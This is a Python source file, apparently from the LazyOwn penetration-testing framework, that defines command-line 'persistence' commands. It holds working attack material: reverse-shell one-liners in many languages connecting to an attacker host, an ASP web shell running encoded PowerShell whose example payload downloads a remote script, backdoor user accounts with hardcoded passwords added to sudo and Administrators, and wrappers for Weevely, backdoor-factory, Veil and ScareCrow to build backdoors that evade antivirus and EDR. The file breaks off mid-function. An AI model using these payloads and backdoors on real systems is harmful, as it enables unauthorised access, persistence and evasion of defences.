"""persist commands migrated from lazyown.py.

Auto-generated by scripts/migrate_lazyown.py.
"""
from __future__ import annotations

import cmd2

from cli.commands._base import LazyOwnCommandSet
from cli.commands._dormancy import PendingCommandSet
from utils import (
    print_msg, print_error, print_warn, print_succ,
    check_rhost, check_lhost, check_lport, check_port,
    GREEN, RED, BLUE, MAGENTA, CYAN, YELLOW, WHITE, RESET,
    UNDERLINE, BOLD,
)

class PersistMigratedCommandSet(PendingCommandSet):
    phase = "persist"
    category = "persistence_category"

    def do_pwncat(self, line):
        """
        Runs `pwncat` with the specified port for listening. SELFINJECT

        This function starts a `pwncat` listener on the specified local port. It can use a port defined in the `lport` parameter or a port provided as an argument.

        Usage:
            pwncatcs <port>

        :param line: The port number to use for the `pwncat-cs` listener. If not provided, it defaults to the `lport` parameter.
        :type line: str
        :returns: None

        Manual execution:
        1. Ensure that `pwncat-cs` is installed and accessible from your command line.
        2. The port number can either be provided as an argument or be assign in the `lport` parameter of the function.
        3. Run the function to start `pwncat-cs` on the specified port.

        If no port is provided as an argument, the function will use the port specified in the `lport` parameter. If a port is provided, it overrides the `lport` value.

        After starting the listener, the function prints a message indicating that `pwncat-cs` is running on the specified port and another message when the session is closed.

        Dependencies:
        - `pwncat-cs`: A tool used for creating reverse shells or bind shells.
        """
        lhost = self.params['lhost']
        lport = self.params['lport']
        if not lport and not line:
            print_error(
                f"lport must be assign or pass the port by parameter like: nc 6666.{RESET}"
            )
            return
        if not line:
            print_msg(f"Try.. pwncat -l {lport} --self-inject /bin/bash:{self.params['lhost']}:{lport}{RESET}")
            self.cmd(f"pwncat -l {lport} --self-inject /bin/bash:{self.params['lhost']}:{lport}")
        else:
            print_msg(f"Try.. pwncat -l {line} --self-inject /bin/bash:{self.params['lhost']}:{line}{RESET}")
            self.cmd(f"pwncat -l {line} --self-inject /bin/bash:{self.params['lhost']}:{line}")
        print_msg(
            f"{RED}[*] {YELLOW} Shutdown pwncat sessions in port {RED} [{lport}|{line}] {RESET}"
        )
        return

    def do_ftp(self, line):
        """
        Connects to an ftp host using credentials from a file and a specified port.

        This function performs the following actions:
        1. Retrieves the remote host (`self.params['rhost']`) from the parameters.
        2. Checks if the `self.params['rhost']` is valid using the `check_rhost` function.
        3. Sets the ftp port to the value provided in the `line` parameter.
        4. Checks if the `credentials.txt` file exists in the `./sessions` directory.
        5. Reads credentials (username and password) from the `credentials.txt` file, where each line is formatted as `user:password`.
        6. Constructs and executes an ftp command using `sshpass` to handle password authentication and `ftp` to initiate the connection.
        7. Displays the ftp command being executed.

        Usage:
            ftp <port>

        :param line: The port number to use for the ftp connection.
        :type line: str
        :returns: None

        Manual execution:
        To manually use this function:
        1. Ensure `sessions/credentials.txt` exists and contains valid ftp credentials in the format `user:password`.
        2. Run the function with the port number as an argument.
        3. The function will attempt to connect to the ftp host using each assign of credentials and the specified port.

        Note: Ensure `sshpass` is installed on your system for password-based SSH authentication. If `sshpass` is not available, you may need to install it or use an alternative method for SSH authentication.
        """

        rhost = self.params['rhost']
        if not check_rhost(self.params['rhost']):
            return


        credentials_file = "./sessions/credentials.txt"
        if not os.path.exists(credentials_file):
            command = f"ftp anonymouse@{self.params['rhost']}"
            command_ftp = "user anonymous ''"
            copy2clip(command_ftp)
            print_msg(command)
            self.cmd(command)
        else:
            if line:
                credentials = get_credentials(ncred=int(line))
            else:
                credentials = get_credentials()
            if not credentials:
                return

            for user, passwd in credentials:
                command = f"sshpass -p '{passwd}' ftp {user}@{self.params['rhost']}"
                print_msg(command)
                self.cmd(command)
        return

    def do_rdp(self, line):
        """
        Reads credentials from a file, encrypts the password, and executes the RDP connection command.

        1. Reads credentials:
            - Reads the username and password from the `sessions/credentials.txt` file.

        2. Encrypts the password:
            - Uses `remmina --encrypt-password` to encrypt the password obtained from the file.

        3. Executes the RDP connection command:
            - Uses the encrypted password to construct and execute the `remmina -c` command to initiate the RDP connection.

        :param line: This function does not use any arguments.
        :type line: str
        :returns: None

        Manual execution:
        To manually execute the command:
        - Ensure `sessions/credentials.txt` contains the credentials in the format `username:password`.
        - Run the `rdp` command to read the credentials, encrypt the password, and connect to the RDP server.
        Example usage: `rdp`
        """
        path = os.getcwd()
        credentials_file = f'{path}/sessions/credentials.txt'

        if not os.path.isfile(credentials_file):
            print_error("Error: Credentials file not found.")
            return

        with open(credentials_file, 'r') as file:
            credentials = file.readline().strip()

        if not credentials:
            print_error("Error: No credentials found in the file.")
            return

        # Split credentials into username and password
        try:
            username, password = credentials.split(':')
        except ValueError:
            print_error("Error: Invalid credentials format in the file.")
            return

        rhost = self.params['rhost']

        if not check_rhost(self.params['rhost']):
            print_error("Error: Invalid or undefined self.params['rhost'].")
            return

        # Construct and execute the remmina command
        remmina_command = f'remmina -c rdp://{username}@{self.params['rhost']}'
        password = password.replace('\r', '').replace('\n', '').splitlines()[0]
        print_msg(password)
        command = f'printf "{password}" | xclip -sel clip'
        self.cmd(command)

        print_msg(f"Executing command: {remmina_command}")
        try:
            subprocess.run(remmina_command, shell=True, check=True)
        except subprocess.CalledProcessError as e:
            print_error(f"Error executing remmina command: {e}")
        return

    def do_grisun0(self, line):
        """
        Creates and copies a shell command to add a new user `grisun0`, assign a password, add the user to the sudo group, and switch to the user.

        1. Displays the command:
            - Prints the command to add the user `grisun0` with home directory `/home/.grisun0`, assign the password, add the user to the `sudo` group, assign the appropriate permissions, and switch to the user.

        2. Copies the command to clipboard:
            - Uses `xclip` to copy the command to the clipboard for easy pasting.

        :param line: This function does not use any arguments.
        :type line: str
        :returns: None

        Manual execution:
        To manually execute the command:
        - Copy the command from the clipboard.
        - Run it in a terminal to create the user and assign up the permissions as specified. useradd -m -d /home/.grisun0 -s /bin/bash grisun0 && echo 'grisun0:grisgrisgris' | chpasswd && usermod -aG sudo grisun0 && chmod 700 /home/.grisun0 && su - grisun0
        Note: Ensure `xclip` is installed and available on your system.
        """

        print_msg("printf \"useradd -m -d /home/.grisun0 -s /bin/bash grisun0 && echo 'grisun0:grisgrisgris' | chpasswd && usermod -aG sudo grisun0 && chmod 700 /home/.grisun0 && sudo usermod -aG sudo grisun0 && su - grisun0\" | xclip -sel clip")
        os.system("printf \"useradd -m -d /home/.grisun0 -s /bin/bash grisun0 && echo 'grisun0:grisgrisgris' | chpasswd && usermod -aG sudo grisun0 && chmod 700 /home/.grisun0 && sudo usermod -aG sudo grisun0 && su - grisun0\" | xclip -sel clip")
        print_warn("Copied to clip ;)")
        return

    def do_grisun0w(self, line):
        """
        Creates and copies a PowerShell command to add a new user `grisun0`, assign a password, add the user to the Administrators group, and switch to the user.

        1. Displays the command:
            - Prints the PowerShell command to add the user `grisun0`, assign the password, add the user to the `Administrators` group, and switch to the user.

        2. Copies the command to clipboard:
            - Uses `clip` to copy the command to the clipboard for easy pasting.

        :param line: This function does not use any arguments.
        :type line: str
        :returns: None

        Manual execution:
        To manually execute the command:
        - Copy the command from the clipboard.
        - Run it in a PowerShell terminal to create the user and assign the permissions as specified.
        """
        command = (
            "powershell $userExists = Get-LocalUser -Name 'grisun0' -ErrorAction SilentlyContinue; "
            "if ($userExists) { Write-Output 'User grisun0 already exists.' } else { "
            "$password = 'Grisgrisgris123!'; "
            "$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; "
            "New-LocalUser -Name 'grisun0' -Password $securePassword -FullName 'Grisun0 User' -Description 'Grisun0 User'; }; "
            "$group = Get-LocalGroup -Name 'Administrators' -ErrorAction SilentlyContinue; "
            "if ($group) { Add-LocalGroupMember -Group 'Administrators' -Member 'grisun0' } else { Write-Output 'Group Administrators was not found.' }; "
            "Start-Process powershell -Verb runAs -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command `\"Start-Process cmd.exe -Verb runAs -ArgumentList \\\"/C runas /user:grisun0 cmd.exe\\\"`\"' ; "
            "net localgroup administrators grisun0 /add"
        )

        copy2clip(command)

    def do_asprevbase64(self, line):
        """
        Creates a base64 encoded ASP reverse shell payload and copies it to the clipboard.

        1. Checks if a base64 encoded payload is provided:
            - If no payload is provided, displays an error message and exits the function.

        2. If a payload is provided:
            - Creates an ASP script that uses `WScript.Shell` to execute a PowerShell command encoded in base64.
            - The created ASP script writes the result of the PowerShell command to the response output.
            - Uses `xclip` to copy the ASP script to the clipboard with the provided base64 encoded payload.

        :param line: The base64 encoded payload to be used in the ASP reverse shell.
        :type line: str
        :returns: None

        Manual execution:
        To manually create the ASP payload:
        - Ensure you have the base64 encoded payload ready.
        - Use `xclip` to copy the provided command to the clipboard.

        Note: Ensure `xclip` is installed and available on your system. For help on creating the base64 encoded payload, see `help winbase64payload`.
        """

        if not line:
            print_error(
                f"you need pass the payload in base64 as argument Ex: {GREEN}asprevbase64 LW5JRVgoTmV3LU9iamVjdCBOZXcuV2ViQ2xpZW50KS5kb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjEwLjE0LjI0MS9wcy5wczEnKSBpY29udiAtdCB1dGYtMTZsZQo="
            )
            return
        self.cmd(
            f'echo -n \'<%response.write CreateObject("WScript.Shell").Exec("cmd /c powershell -encodedcommand {line}").StdOut.Readall()%>\' | xclip -sel clip'
        )
        print_msg(
            f'Try... echo -n \'<%response.write CreateObject("WScript.Shell").Exec("cmd /c powershell -encodedcommand {line}").StdOut.Readall()%>\' | xclip -sel clip'
        )
        return

    def do_weevelygen(self, line):
        """
        Generate a PHP backdoor using Weevely, protected with the given password.

        This function generates a PHP backdoor file using the specified password. It ensures that Weevely is installed on the system before attempting to generate the backdoor. If Weevely is not present, it will be installed automatically.

        Usage:
        ┌─[LazyOwn👽127.0.0.1 ~/LazyOwn][10.10.10.10][http://victim.local/]
        └╼ $ weevelygen s3cr3t

        Parameters:
        line (str): The password to protect the generated PHP backdoor.

        Returns:
        None

        Raises:
        print_error: If the password argument is not provided.
        print_warn: If Weevely is not installed and needs to be installed.

        Example:
        To generate a PHP backdoor protected with the password 's3cr3t', use the following command:
        $ weevelygen s3cr3t
        """
        if not is_binary_present("weevely"):
            print_warn("installing weevely...")
            self.cmd("sudo apt install weevely -y")

        if not line:
            print_error("You must pass the password of weevly shell as an argument. example: weevelygen s3cr3t")
            return

        name = input("    [!] Enter the file name: (default: weevely.php)") or 'weevely.php'
        command = f"cd sessions && weevely generate {line} {name}"
        print_msg(f"weevely generate {line} {name}")
        self.cmd(command)
        print_msg(f"Now you can run: weevely http//:victim.local/{name} {line}")
        return

    def do_weevely(self, line):
        """
        Connect to PHP backdoor using Weevely, protected with the given password.

        This function Connect to PHP backdoor file using the specified password. It ensures that Weevely is installed on the system before attempting to generate the backdoor. If Weevely is not present, it will be installed automatically.

        Usage:
        ┌─[LazyOwn👽127.0.0.1 ~/LazyOwn][10.10.10.10][http://victim.local/]
        └╼ $ weevely http://victim.local/weevely.php s3cr3t

        Parameters:
        line (str): the url to Weevely shell and the password to protect the generated PHP backdoor.

        Returns:
        None

        Raises:
        print_error: If the password argument is not provided.
        print_warn: If Weevely is not installed and needs to be installed.

        Example:
        To generate a PHP backdoor protected with the password 's3cr3t', use the following command:
        $ weevelygen s3cr3t
        """
        if not is_binary_present("weevely"):
            print_warn("installing weevely...")
            self.cmd("sudo apt install weevely -y")

        if not line:
            print_error("You must pass url and the password of weevly shell as an argument. example: weevely http://victim.local/weevely.php s3cr3t")
            return

        args = line.split(" ")

        if len(args) == 2:
            url = args[0]
            password = args[1]
            command = f"weevely {url} {password}"
            print_msg(command)
            self.cmd(command)
        else:
            print_error("You must pass url and the password of weevly shell as an argument. example: weevely http://victim.local/weevely.php s3cr3t")
            return
        return

    def do_backdoor_factory(self, line):
        """
        Creates a backdoored executable using `backdoor-factory`.

        This function checks if `backdoor-factory` is installed, installs it if necessary, and then uses it to
        inject a reverse shell payload into a specified binary file. The binary is backdoored with a
        reverse shell payload that connects back to a specified host and port.

        :param line: The absolute path to the file that will be backdoored. If not provided, the user is prompted
                    to enter the path.

        :returns: None

        Manual execution:
        To manually create a backdoored executable, use the following command:
            backdoor-factory -f <file_path> -H <self.params['lhost']> -P <lport> -s reverse_shell_tcp_inline -J -a -c -l 128 -o <output_file>

        Replace `<file_path>` with the path to the binary you want to backdoor, `<self.params['lhost']>` with the IP address of
        the attacker’s machine, and `<lport>` with the port number to listen on. The `<output_file>` is the path
        where the backdoored binary will be saved.

        For example:
            backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp_inline -J -a -c -l 128 -o sessions/backdoor_factory.exe
        """

        if not is_binary_present("backdoor-factory"):
            print_warn("Installing backdoor-factory...")
            self.cmd("sudo apt install backdoor-factory -y")

        lhost = self.params['lhost']
        lport = self.params['lport']
        if not check_lhost(self.params['lhost']):
            return

        if not check_lport(lport):
            return

        if not line:
            print_error("you need enter the path to file to backdoored")
            line = input("    [!] Enter the absolute path: ")

        print_msg(f"Try... backdoor-factory -f {line} -H {self.params['lhost']} -P {lport} -s reverse_shell_tcp_inline -J -a -c -l 128 -o sessions/backdoor_factory.exe {RESET}")
        self.cmd(f"backdoor-factory -f {line} -H {self.params['lhost']} -P {lport} -s reverse_shell_tcp_inline -J -a -c -l 128 -o sessions/backdoor_factory.exe")
        return

    def do_msfpc(self, line):
        """
        Generates payloads using MSFvenom Payload Creator (MSFPC).

        This function checks if `msfpc` is installed and installs it if necessary. It then runs `msfpc`
        with the specified parameters to create a payload for penetration testing.

        :param line: Not used in this implementation but reserved for future use.

        :returns: None

        Manual execution:
        To manually generate a payload using MSFPC, use the following command:
            msfpc <TYPE> <DOMAIN/IP> <PORT> <CMD/MSF> <BIND/REVERSE> <STAGED/STAGELESS> <TCP/HTTP/HTTPS/FIND_PORT> <BATCH/LOOP> <VERBOSE>

        Replace the placeholders with the desired values. For example:
            msfpc windows 192.168.1.10 4444 reverse stageless tcp verbose

        Example usage:
            msfpc windows 192.168.1.10        # Windows & manual IP.
            msfpc elf bind eth0 4444          # Linux, eth0's IP & manual port.
            msfpc stageless cmd py https      # Python, stageless command prompt.
            msfpc verbose loop eth1           # A payload for every type, using eth1's IP.
            msfpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
        """

        if not is_binary_present("msfpc"):
            print_warn("Installing msfpc...")
            self.cmd("sudo apt install msfpc -y")

        payload_types = [
            "APK",
            "ASP",
            "ASPX",
            "Bash [.sh]",
            "Java [.jsp]",
            "Linux [.elf]",
            "OSX [.macho]",
            "Perl [.pl]",
            "PHP",
            "Powershell [.ps1]",
            "Python [.py]",
            "Tomcat [.war]",
            "Windows [.exe // .exe // .dll]"
        ]

        print_warn("Select the payload type:")
        for i, payload_type in enumerate(payload_types, start=1):
            print_msg(f"{i}. {payload_type}")

        type_choice = int(input("Enter the number corresponding to the payload type: ")) - 1
        if type_choice < 0 or type_choice >= len(payload_types):
            print_error("Invalid choice. Please select a valid number.")
            return

        selected_type = payload_types[type_choice].split()[0].lower()

        params = {
            "type": selected_type,
            "lhost": input("Enter the target IP or domain (default lhost): ") or self.params['lhost'],
            "lport": input("Enter the port (default lport): ") or self.params['lport'],
            "cmd_msf": input("Enter CMD or MSF (default msf): ") or "msf",
            "bind_reverse": input("Enter BIND or REVERSE (default reverse): ") or "reverse",
            "staged_stageless": input("Enter STAGED or STAGELESS (default stageless): ") or "stageless",
            "protocol": input("Enter protocol (TCP, HTTP, HTTPS, FIND_PORT) (default tcp): ") or "tcp",
            "batch_loop": input("Enter BATCH or LOOP (optional): "),
            "verbose": input("Enter VERBOSE (optional): ")
        }

        msfpc_command = (
            f"msfpc {params['type']} {params['lhost']} {params['lport']} {params['cmd_msf']} "
            f"{params['bind_reverse']} {params['staged_stageless']} {params['protocol']} "
            f"{params['batch_loop']} {params['verbose']}"
        )

        print_msg(f"Generating payload with MSFPC: {msfpc_command}")
        self.cmd(msfpc_command)

        return

    def do_ivy(self, line):
        """
        Generates payloads using Ivy with various options. Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.

        This function checks if `Ivy` is installed and installs it if necessary. It then runs `Ivy`
        with the specified parameters to create various payloads.

        :param line: Not used in this implementation but reserved for future use.

        :returns: None

        Manual execution:
        To manually generate a payload using Ivy, use the following command:
            ./Ivy <OPTIONS>

        Replace the placeholders with the desired values. For example:
            ./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js
            ./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:\\windows\\system32\\notepad.exe -process32 C:\\windows\\SysWOW64\\notepad.exe -O stageless.js

        Example usage:
            ivy staged_inject -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js
            ivy stageless_local -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js
            ivy one_liner -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless
        """

        if not is_binary_present("Ivy"):
            print_warn(f"Ivy is not installed. Installing Ivy... to download option {GREEN}50")
            self.onecmd("download_external")
            self.cmd("go get github.com/fatih/color")
            self.cmd("go get github.com/KyleBanks/XOREncryption/Go")
            self.cmd("go build Ivy.go")


        options = {
            "staged_inject": {
                "cmd": "Ivy -Ix64 {x64_file} -Ix86 {x86_file} -P Inject -O sessions/{output_file}"
            },
            "staged_local": {
                "cmd": "Ivy -Ix64 {x64_file} -Ix86 {x86_file} -P Local -O sessions/{output_file}"
            },
            "stageless_local": {
                "cmd": "Ivy -stageless -Ix64 {x64_file} -Ix86 {x86_file} -P Local -O sessions/{output_file}"
            },
            "stageless_inject": {
                "cmd": "Ivy -stageless -Ix64 {x64_file} -Ix86 {x86_file} -P Inject -O sessions/{output_file}"
            },
            "stageless_inject_process": {
                "cmd": "Ivy -stageless -Ix64 {x64_file} -Ix86 {x86_file} -P Inject -process64 {process64} -process32 {process32} -O sessions/{output_file}"
            },
            "unhooked_stageless_local": {
                "cmd": "Ivy -stageless -Ix64 {x64_file} -Ix86 {x86_file} -P Local -unhook -O sessions/{output_file}"
            },
            "unhooked_stageless_inject": {
                "cmd": "Ivy -stageless -Ix64 {x64_file} -Ix86 {x86_file} -P Inject -unhook -O sessions/{output_file}"
            },
            "one_liner_non_executable": {
                "cmd": "Ivy -Ix64 {x64_file} -Ix86 {x86_file} -P Inject -O sessions/{output_file} -stageless"
            },
            "bitsadmin_command": {
                "cmd": "Ivy -Ix64 {x64_file} -Ix86 {x86_file} -P Local -O sessions/{output_file} -url {url} -delivery bits -stageless"
            },
            "mshta_command": {
                "cmd": "Ivy -Ix64 {x64_file} -Ix86 {x86_file} -P Local -O sessions/{output_file} -url {url} -delivery hta -stageless"
            },
            "stylesheet_payload": {
                "cmd": "Ivy -Ix64 {x64_file} -Ix86 {x86_file} -P Local -O sessions/{output_file} -url {url} -delivery xsl -stageless"
            },
            "macro_web_downloader": {
                "cmd": "Ivy -Ix64 {x64_file} -Ix86 {x86_file} -P Local -O sessions/{output_file} -url {url} -delivery macro -stageless"
            }
        }

        print_warn("Select the payload type:")
        for i, option in enumerate(options.keys(), start=1):
            print_msg(f"{i}. {option.replace('_', ' ').title()}")

        type_choice = int(input("Enter the number corresponding to the payload type: ")) - 1
        if type_choice < 0 or type_choice >= len(options):
            print_error("Invalid choice. Please select a valid number.")
            return

        selected_type = list(options.keys())[type_choice]

        params = {
            "x64_file": "stageless64.bin",
            "x86_file": "stageless32.bin",
            "output_file": input("Enter the Name of the payload (payload.txt): "),
            "process64": input("Enter 64-bit process path (optional): "),
            "process32": input("Enter 32-bit process path (optional): "),
            "url": input("Enter URL (optional): ")
        }

        ivy_command = options[selected_type]["cmd"].format(**params)

        print_msg(f"Generating payload with Ivy: {ivy_command}")
        self.cmd(ivy_command)

        return

    def do_veil(self, line):
        """
        Generates payloads using Veil-Evasion with various options. Veil-Evasion is a payload creation framework
        for generating payloads that evade antivirus detection. This function checks if `Veil-Evasion` is installed
        and installs it if necessary. It then runs `Veil-Evasion` with the specified parameters to create various payloads.

        :param line: Not used in this implementation but reserved for future use.

        :returns: None

        Manual execution:
        To manually generate a payload using Veil-Evasion, use the following command:
            ./Veil-Evasion.py -p <PAYLOAD> --<OPTION> <VALUE>

        Replace the placeholders with the desired values. For example:
            ./Veil-Evasion.py -p python/meterpreter/rev_https LHOST=192.168.1.100 LPORT=443

        Example usage:
            veil python_meterpreter_rev_https LHOST=192.168.1.100 LPORT=443
            veil ruby_meterpreter_rev_tcp LHOST=192.168.1.100 LPORT=4444
        """
        lport = self.params['lport']
        lhost = self.params['lhost']
        if not check_lhost(self.params['lhost']):
            return
        if not check_lport(lport):
            return

        if not is_binary_present("Veil-Evasion.py"):
            print_warn("Veil-Evasion is not installed. Installing Veil-Evasion...")
            self.cmd("git clone https://github.com/Veil-Framework/Veil.git external/.exploit/Veil")
            self.cmd("cd external/.exploit/Veil && ./config/setup.sh --force --silent")


        options = {
            "python_meterpreter_rev_https": {
                "cmd": "Veil-Evasion.py -p python/meterpreter/rev_https LHOST={self.params['lhost']} LPORT={lport} -o {output_file}"
            },
            "ruby_meterpreter_rev_tcp": {
                "cmd": "Veil-Evasion.py -p ruby/meterpreter/rev_tcp LHOST={self.params['lhost']} LPORT={lport} -o {output_file}"
            },
            "powershell_meterpreter_https": {
                "cmd": "Veil-Evasion.py -p powershell/meterpreter/rev_https LHOST={self.params['lhost']} LPORT={lport} -o {output_file}"
            },
            "c_sharp_meterpreter_https": {
                "cmd": "Veil-Evasion.py -p csharp/meterpreter/rev_https LHOST={self.params['lhost']} LPORT={lport} -o {output_file}"
            }
        }

        print_warn("Select the payload type:")
        for i, option in enumerate(options.keys(), start=1):
            print_msg(f"{i}. {option.replace('_', ' ').title()}")

        type_choice = int(input("Enter the number corresponding to the payload type: ")) - 1
        if type_choice < 0 or type_choice >= len(options):
            print_error("Invalid choice. Please select a valid number.")
            return

        selected_type = list(options.keys())[type_choice]

        params = {
            "self.params['lhost']": self.params['lhost'],
            "lport": lport,
            "output_file": "sessions/payload.txt"
        }

        veil_command = options[selected_type]["cmd"].format(**params)

        print_msg(f"Generating payload with Veil-Evasion: {veil_command}")
        self.cmd(veil_command)

        return

    def do_scarecrow(self, line):
        """
        Executes ScareCrow with various options for bypassing EDR solutions and executing shellcode.
        to create the shellcode.bin you need run venom or run lazymsfvenom, or run msfvenom yourself :D
        :param line: Not used directly but reserved for future use.
        :returns: None
        """
        if not is_binary_present("ScareCrow"):
            print_warn("ScareCrow is not installed. Installing dependencies and building ScareCrow.")
            self.cmd("sudo apt-get install -y golang osslsigncode mingw-w64")
            self.cmd("go get github.com/fatih/color")
            self.cmd("go get github.com/yeka/zip")
            self.cmd("go get github.com/josephspurrier/goversioninfo")
            self.cmd("mkdir -p ~/bypass && cd ~/bypass && git clone https://github.com/optiv/ScareCrow && cd ScareCrow && go build ScareCrow.go")

            command = """
            bash -c '
            if [[ "$SHELL" == */bash ]]; then
                echo "    [!] Bash"
                echo "export PATH=$PATH:~/bypass/ScareCrow" >> ~/.bashrc
            elif [[ "$SHELL" == */zsh ]]; then
                echo "    [!] Zsh"
                echo "export PATH=$PATH:~/bypass/ScareCrow" >> ~/.zshrc
            fi
            '
            """.replace("            ", "")
            self.cmd(command)
        url = self.params['url']
        domain = self.params['domain']
        print_warn("Select the mode you want to use:")
        options = [
            "Evasion (Disk, KnownDLL, None)",
            "Exec (RtlCopy, ProcessInjection, NtQueueApcThreadEx, VirtualAlloc)",
            "Loader (binary, control, dll, excel, msiexec, wscript)",
            "Clone Cert",
            "Custom Config File",
            "Enable Console Mode",
            "Delivery (bits, hta, macro)",
            "Domain Cert",
            "Encryption Mode (AES, ELZMA, RC4)",
            "Export (DLL)",
            "Injection Path",
            "Disable AMSI",
            "Disable ETW",
            "Disable Signing",
            "Disable Sleep Delay",
            "Obfuscation",
            "Set Output Path",
            "Sandbox Evasion",
            "Set URL",
            "Set Valid Cert"
        ]

        for i, option in enumerate(options, start=1):
            print_msg(f"{i}. {option}")

        try:
            choice = int(input("    [!] Enter the number corresponding to the option: ")) - 1
            if choice < 0 or choice >= len(options):
                print_error("Invalid choice. Please select a valid number.")
                return
            print_msg("Enter the shellcode.bin: ")
            shellcode = get_users_dic("bin")
            if not shellcode:
                print_error("Enter a valid choice")
                return
            scarecrow_command = f"cd sessions && ~/bypass/ScareCrow/ScareCrow -I {shellcode}"

            if choice == 0:
                evasion = input("    [!] Enter Evasion type (Disk/KnownDLL/None) [default: Disk]: ").strip() or "Disk"
                scarecrow_command += f" -Evasion {evasion}"
                scarecrow_command += f" -self.params['domain'] {self.params['domain']}"

            if choice == 1:
                exec_method = input("    [!] Enter Exec method (RtlCopy/ProcessInjection/NtQueueApcThreadEx/VirtualAlloc) [default: RtlCopy]: ").strip() or "RtlCopy"
                scarecrow_command += f" -Exec {exec_method}"
                scarecrow_command += f" -self.params['domain'] {self.params['domain']}"
            if choice == 2:
                loader = input("    [!] Enter Loader type (binary/control/dll/excel/msiexec/wscript) [default: binary]: ").strip() or "binary"
                scarecrow_command += f" -Loader {loader}"

                if loader in ["binary", "dll"]:
                    shellcode_path = input("    [!] Enter the path to the raw 64-bit shellcode [default: /path/to/shellcode]: ").strip() or "sessions/shellcode.bin"
                    scarecrow_command += f" -I {shellcode_path}"

                if loader not in ["binary", "dll"]:
                    output_name = input("    [!] Enter the output file name (e.g., loader.js or loader.hta) [default: loader.js]: ").strip() or "loader.js"
                    scarecrow_command += f" -O sessions/{output_name}"

                if loader in ["control", "excel", "wscript"]:
                    delivery = input("    [!] Enter delivery method (bits/hta/macro) [default: bits]: ").strip() or "bits"
                    scarecrow_command += f" -delivery {delivery}"
                    if delivery == "hta" and loader in ["binary", "dll"]:
                        print_error("Binary and DLL loaders are not compatible with HTA delivery.")
                        return
                scarecrow_command += f" -self.params['domain'] {self.params['domain']}"
            if choice == 7:
                delivery = input("    [!] Enter delivery method (bits/hta/macro): ").strip()
                scarecrow_command += f" -delivery {delivery}"

            if choice == 8:
                encryption = input("    [!] Enter encryption mode (AES/ELZMA/RC4): ").strip()
                scarecrow_command += f" -encryptionmode {encryption}"

            if choice == 19:
                url = input(f"    [!] Enter the url [default: {url}]: ").strip() or url
                scarecrow_command += f" -url {url}"



            print_msg(f"Running ScareCrow with command: {scarecrow_command}")
            self.cmd(f"{scarecrow_command} ")

        except ValueError:
            print_error("Invalid input. Please enter a valid number.")
        return

    def do_generate_revshell(self, line):
        """
        Generate a reverse shell in various programming languages.

        This function prompts the user to choose a reverse shell type (Bash, Python, NetCat, PHP, Ruby, Perl, Telnet, NodeJS, Golang, PowerShell)
        and then asks for the necessary parameters (IP and port). Based on the user's input, it generates the corresponding
        reverse shell command.

        :param line: Not used in this implementation.
        :returns: None
        """
        shell_options = {
            "1": "Bash",
            "2": "Python",
            "3": "NetCat",
            "4": "PHP",
            "5": "Ruby",
            "6": "Perl",
            "7": "Telnet",
            "8": "NodeJS",
            "9": "Golang",
            "10": "PowerShell"
        }

        print_msg("Choose the type of reverse shell to generate:")
        for key, value in shell_options.items():
            print_msg(f"{key}. {value}")

        choice = input("    [!] Enter your choice (1-10): ").strip()
        if choice not in shell_options:
            print_error("Invalid choice. Please enter a number between 1 and 10.")
            return
        lhost = self.params['lhost']
        lport = self.params['lport']
        ip = input(f"    [!] Enter IP (default: {self.params['lhost']}): ").strip() or self.params['lhost']
        port = input(f"    [!] Enter Port (default: {lport}): ").strip() or lport

        if choice == "1":
            command = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f"
        elif choice == "2":
            command = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
        elif choice == "3":
            command = f"nc -e /bin/sh {ip} {port}"
        elif choice == "4":
            command = f"php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
        elif choice == "5":
            command = f"ruby -rsocket -e'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
        elif choice == "6":
            command = f"perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}};'"
        elif choice == "7":
            command = f"rm -f /tmp/p; mknod /tmp/p p && telnet {ip} {port} 0/tmp/p"
        elif choice == "8":
            command = f"node -e 'var net = require(\"net\"), cp = require(\"child_process\"), sh = cp.spawn(\"/bin/sh\", []); var client = new net.Socket(); client.connect({port}, \"{ip}\", function(){{ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }});'"
        elif choice == "9":
            command = f'package main;import"os/exec";import"net";func main(){{c,_:=net.Dial("tcp","{ip}:{port}");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}'
        elif choice == "10":
